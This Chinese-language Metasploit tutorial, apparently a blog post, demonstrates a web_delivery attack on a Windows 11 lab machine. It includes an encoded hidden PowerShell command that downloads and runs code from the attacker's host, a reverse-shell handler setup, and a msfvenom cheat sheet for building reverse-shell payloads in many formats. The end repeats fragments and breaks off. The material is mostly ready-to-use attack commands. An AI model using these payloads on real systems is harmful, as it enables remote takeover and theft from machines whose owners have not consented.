终端输入msfconsole
使用exploit/multi/script/web_delivery 模块
use exploit/multi/script/web_delivery
进入模块后可以使用以下命令,进行攻击的配置
show targets #查看可选择的目标类型
set target 对应编号|目标类型 #设置攻击目标
show payloads #查看可利用的payload,在选择完target后可显示对应的payload
set payload 对应编号|目标类型 #设置攻击载荷
show options #显示利用模块,所需参数,以及目前设置的参数
set lhost #设置服务器ip 填自己主机的 反向连接时需要
set lport #设置服务器端口
set rhost #设置目标主机ip
set rport #设置目标主机端口
run / expliot #运行模块
这里演示一下对windows的攻击,前提是需要在目标主机上可以命令执行
攻击主机kali:192.168.52.128 靶机windows11
复制上面显示的这段命令
powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJAB4AEcAWgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ADsAaQBmACgAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUAByAG8AeAB5AF0AOgA6AEcAZQB0AEQAZQBmAGEAdQBsAHQAUAByAG8AeAB5ACgAKQAuAGEAZABkAHIAZQBzAHMAIAAtAG4AZQAgACQAbgB1AGwAbAApAHsAJAB4AEcAWgAuAHAAcgBvAHgAeQA9AFsATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEcAZQB0AFMAeQBzAHQAZQBtAFcAZQBiAFAAcgBvAHgAeQAoACkAOwAkAHgARwBaAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADUAMgAuADEAMgA4ADoAOAAwADgAMAAvAGIATQBXAHMAdwBZAHMATABhAFkAagBEAC8AQQBXAEUAMQBvAHkARwBTAEkAcQBlAGIAagB2ACcAKQApADsASQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4ANQAyAC4AMQAyADgAOgA4ADAAOAAwAC8AYgBNAFcAcwB3AFkAcwBMAGEAWQBqAEQAJwApACkAOwA=
目标主机运行
这里运行后,可能会卡住,直接摁回车
然后输入sessions 即可以查看是否成功控制目标主机
关于session相关命令
show sessions | sessions #显示获取的所有会话
sessions -i 对应的会话id #使用此会话,并且进入meterpreter后渗透模块
进入meterpreter 切记不要随便使用exit离开,会导致会话直接消失
可以使用background 进行后台运行sessions #后台运行sessions
exploit/multi/handler模块 eg.这里依然以windows举例
use exploit/multi/handler
set payloa windows/meterpreter/reverse_tcp
set lhost 192.168.52.128
set lport 1111
exploit -z -j#后台执行
前提是利用Msfvenom生成木马,并且在目标主机上执行此木马
这里不举例了,想看例子的可以查看这篇msf生成木马_msfvenom -p linux/x86/meterpreter/reverse_tcp lhos-CSDN博客
博客
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.machoWeb Payloads
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo ' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
Scripting Payloads
Python
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
hell.sh
Perl
```bash
msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl